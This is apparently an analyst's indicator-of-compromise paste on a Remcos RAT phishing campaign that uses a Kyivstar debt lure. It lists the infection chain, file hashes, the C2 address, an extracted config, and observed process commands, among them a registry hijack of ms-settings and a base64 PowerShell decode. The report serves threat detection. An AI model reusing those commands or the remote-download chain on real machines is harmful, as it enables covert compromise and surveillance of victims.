VRad

#remcos_211223

Dec 21st, 2023 (edited)
  1. #IOC #OptiData #VR #remcos #SMB #RAT #mic #keylog #scr
  2.  
  3. https://pastebin.com/samYnJq6
  4.  
  5. previous_contact:
  6. 30/11/23 https://pastebin.com/aG6XyqHN
  7. 13/11/23 https://pastebin.com/tbRpiGG5
  8. 06/02/23 https://pastebin.com/kjv5E8Au
  9. 12/07/21 https://pastebin.com/ZYZarB9L
  10. 15/07/19 https://pastebin.com/ZxG6eRWM
  11.  
  12. FAQ:
  13. https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
  14.  
  15. attack_vector
  16. --------------
  17. email > att1 .zip > att2 + att3 .RAR > att4.RAR (pwd) > .doc (vba) > SMB \\89_23_98_22\LN\GB.exe > bitbucket_org / olegovich-007 / 777 / downloads / wsuscr.exe
  18.  
  19. # # # # # # # #
  20. email_headers
  21. # # # # # # # #
  22. Date: Wed, 20 Dec 2023 22:39:50 -0800
  23. From: Лелюк Йоханес Вітанович <dj@benno.at>
  24. Subject: Заборгованість за договором Київстар – Передсудове
  25. Received: from mx20lb.world4you.com ([81.19.149.130])
  26. Received: from [94.131.102.115] (helo=98.159.36.138) by mx20lb.world4you.com with esmtpa (Exim 4.96.2)
  27. Reply-To: "info@kyivstar.net" <info@kyivstar.net>
  28.  
  29. # # # # # # # #
  30. files
  31. # # # # # # # #
  32.  
  33. SHA-256 8b48c11a538af362b766d8ccb09ef11ad6ee62bb430424c9f78d8e7cd5785b7a
  34. File name Заборгованість абонента.zip [ Zip archive data, at least v1.0 to extract ]
  35. File size 508.35 KB (520555 bytes)
  36.  
  37. SHA-256 ca9093b05cf9e02e06f58c9819042b36b29b8461b4e8f6280bb74a76dcf3e449
  38. File name Заборгованість абонента.part1.rar [ RAR archive data, v5 ]
  39. File size 350.00 KB (358400 bytes)
  40.  
  41. SHA-256 9f63016c2b9c83da3dca2173ca5f443d7e0e5289983c441fe064766f2da3a2ba
  42. File name Заборгованість абонента.part2.rar [ RAR archive data, v5 ]
  43. File size 157.52 KB (161301 bytes)
  44.  
  45. SHA-256 823a799018d1ab0c2eb4c2b26d3f2eb0342fbc30eac34379903398c97d350827
  46. File name Заборгованість абонента.rar [RAR archive data, v5] !PWD
  47. File size 506.79 KB (518958 bytes)
  48.  
  49. SHA-256 93aa6fc207df430a6e9833259e618895bcdb75c7db0850599d3dbb87d47a54c7
  50. File name Заборгованість абонента.doc [ MS Word Document ] !VBA
  51. File size 672.00 KB (688128 bytes)
  52.  
  53. SHA-256 d698994e527111a6ddd590e09ddf08322d54b82302e881f5f27e3f5d5368829c
  54. File name GB.exe [ PE32+ executable ] !Loader
  55. File size 262.50 KB (268800 bytes)
  56.  
  57. SHA-256 7c3476fd586bcb7f42e706f32999356fb4b2c8341f00b8297cf74131f6fa611c
  58. File name test2.exe [ PE32+ executable ] !Loader
  59. File size 172.00 KB (176128 bytes)
  60.  
  61. SHA-256 6619b7126840529091b2da2fa1b7238d6b10bc17bbfc8327aad3683ae686b81d
  62. File name wsuscr.exe [ .NET executable ] !Payload - remcos
  63. File size 14.92 MB (15644672 bytes)
  64.  
  65. # # # # # # # #
  66. activity
  67. # # # # # # # #
  68.  
  69. PL_SCR bitbucket_org / olegovich-007 / 777 / downloads / wsuscr.exe
  70.  
  71.  
  72. C2 45_87_155_41 : 8080
  73.  
  74. netwrk
  75. --------------
  76. 89_23_98_22 445 SMB2 Tree Connect Request Tree: \\89_23_98_22\IPC$
  77. 89_23_98_22 445 SMB2 Create Request File: GB.exe
  78. 104_192_141_1 443 TLSv1 bitbucket_org Client Hello
  79.  
  80. comp
  81. --------------
  82. System TCP 89_23_98_22 445 ESTABLISHED
  83. powershell.exe TCP 104_192_141_1 443 ESTABLISHED
  84.  
  85. proc
  86. --------------
  87. "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n
  88. C:\Windows\SysWOW64\explorer.exe "\\89.23.98.22\LN\"
  89. \??\UNC\89.23.98.22\LN\GB.exe "\\89.23.98.22\LN\GB.exe"
  90. C:\Windows\system32\cmd.exe /c res.bat && test2.exe
  91. C:\Windows\system32\cmd.exe /S /D /c" echo f
  92. C:\Windows\system32\xcopy.exe xcopy /s test2.exe "C:\TEMP\persistent2\test2.exe"
  93. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command "[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String ...
  94.  
  95. C:\Windows\system32\reg.exe add HKCU\Software\Classes\.omg\Shell\Open\command /d C:\Users\ADMINI~1\AppData\Local\Temp\persistent2\test2.exe /f
  96.  
  97. C:\Windows\system32\reg.exe add HKCU\Software\Classes\ms-settings\CurVer /d .omg /f
  98. C:\Windows\system32\reg.exe delete HKCU\Software\Classes\.omg\ /f
  99. C:\Windows\system32\reg.exe delete HKCU\Software\Classes\ms-settings\ /f
  100.  
  101. C:\Users\operator\AppData\Roaming\wsuscr.exe
  102. C:\ProgramData\wsus\wsus.exe
  103.  
  104. C:\TEMP\IXP000.TMP\test2.exe
  105. C:\Windows\system32\cmd.exe /c "test2.bat"
  106. C:\Windows\system32\net.exe session
  107. C:\Windows\system32\net1.exe session
  108.  
  109. persist
  110. --------------
  111. HKCU\Software\Classes\.omg\Shell\Open\command /d C:\Users\ADMINI~1\AppData\Local\Temp\persistent2\test2.exe /f
  112.  
  113. drop
  114. --------------
  115. %temp%\test2.exe
  116. %appdata%\wsuscr.exe
  117. ProgramData\wsus\wsus.exe
  118.  
  119. # # # # # # # #
  120. additional info
  121. # # # # # # # #
  122. malware_config
  123. {
  124. "Version": "4.9.3 Pro",
  125. "Host:Port:Password": "45_87_155_41 : 8080",
  126. "Assigned name": "wsus",
  127. "Connect interval": "1",
  128. "Install flag": "Enable",
  129. "Setup HKCU\\Run": "Enable",
  130. "Setup HKLM\\Run": "Enable",
  131. "Install path": "Application path",
  132. "Copy file": "wsus.exe",
  133. "Startup value": "Disable",
  134. "Hide file": "Disable",
  135. "Mutex": "dvwsus-SFNWWW",
  136. "Keylog flag": "0",
  137. "Keylog path": "Application path",
  138. "Keylog file": "logs.dat",
  139. "Keylog crypt": "Disable",
  140. "Hide keylog file": "Disable",
  141. "Screenshot flag": "Disable",
  142. "Screenshot time": "10",
  143. "Take Screenshot option": "Disable",
  144. "Take screenshot title": "",
  145. "Take screenshot time": "5",
  146. "Screenshot path": "AppData",
  147. "Screenshot file": "Screenshots",
  148. "Screenshot crypt": "Disable",
  149. "Mouse option": "Disable",
  150. "Delete file": "Disable",
  151. "Audio record time": "5"
  152. }
  153.  
  154.  
  155. other_files_from_SMB
  156. https://www.virustotal.com/gui/file/d698994e527111a6ddd590e09ddf08322d54b82302e881f5f27e3f5d5368829c/details
  157. https://www.virustotal.com/gui/file/9cd6bd7e4391a92c402118c4d4541c65a9ae4996ad2c37384967e620f2452dca/details
  158. https://www.virustotal.com/gui/file/961b36bb78d27b3432fae08e5c4272fe295b5e24e832c6f6bf1ec3cf87057dab/details
  159. https://www.virustotal.com/gui/file/efa2f3a45664c73d2283d5acc094013466de47753b795193dd37f2e54a13b34a/details
  160. https://www.virustotal.com/gui/file/72d683597d351182d5ceaf884e2f028eddf3bf9a53fdb166024191720efc49ff/details
  161. https://www.virustotal.com/gui/file/800cd06e420db368d76de6067d887fb0a801ed31b787efbfde248ff28168eb54/details
  162. https://www.virustotal.com/gui/file/34318cdef0cad69ba0ba6f68b42fdd5c581abdbc4feceeab73bc13c56840e7fa/details
  163. https://www.virustotal.com/gui/file/10cef0b0f286a3f715aaad09fa089a97c10b98cf01cbae4c702eb49c7331f461/details
  164. https://www.virustotal.com/gui/file/ff0a84220d028052a841312cd81baa525d19f7e4b0ce94dbbaf6634a776d3814/details
  165. https://www.virustotal.com/gui/file/f58add586ed2fd30ffc10eff51f55f859eff1e7870743d46a5cfdc7b76a5e308/details
  166. https://www.virustotal.com/gui/file/07c6deac35b7070d7d9ded3fca62d976c054c1ad8e466a822543cee33ea04437/details
  167. https://www.virustotal.com/gui/file/15399042016065429443742d3638917dffec34e0ae6921d4b10ba9b5c2bf4353/details
  168. https://www.virustotal.com/gui/file/3c8861781bc5c16b4490863e238c5dc72fbe6586a1ee36df8989e7993a9c46b3/details
  169. https://www.virustotal.com/gui/file/24ab05b58fefbbaddf9d332076e9f9764a3610d7985be88dd6054d68ec991618/details
  170. https://www.virustotal.com/gui/file/6d8628ee670cea59d5314f18aacb449b858e9194a78d4256342999798b54ad13/details
  171. # # # # # # # #
  172. VT & Intezer
  173. # # # # # # # #
  174. https://www.virustotal.com/gui/file/8b48c11a538af362b766d8ccb09ef11ad6ee62bb430424c9f78d8e7cd5785b7a/details
  175. https://www.virustotal.com/gui/file/ca9093b05cf9e02e06f58c9819042b36b29b8461b4e8f6280bb74a76dcf3e449/details
  176. https://www.virustotal.com/gui/file/9f63016c2b9c83da3dca2173ca5f443d7e0e5289983c441fe064766f2da3a2ba/details
  177. https://www.virustotal.com/gui/file/823a799018d1ab0c2eb4c2b26d3f2eb0342fbc30eac34379903398c97d350827/details
  178. https://www.virustotal.com/gui/file/93aa6fc207df430a6e9833259e618895bcdb75c7db0850599d3dbb87d47a54c7/details
  179. https://analyze.intezer.com/analyses/268883ca-795e-449b-98aa-3166b2384fea/behavior
  180. https://www.virustotal.com/gui/file/d698994e527111a6ddd590e09ddf08322d54b82302e881f5f27e3f5d5368829c/details
  181. https://analyze.intezer.com/analyses/113f3f5c-ddc5-4bb5-aa7b-e3d114b44a2b/behavior
  182. https://www.virustotal.com/gui/file/7c3476fd586bcb7f42e706f32999356fb4b2c8341f00b8297cf74131f6fa611c/details
  183. https://www.virustotal.com/gui/file/6619b7126840529091b2da2fa1b7238d6b10bc17bbfc8327aad3683ae686b81d/details
  184.  
  185. VR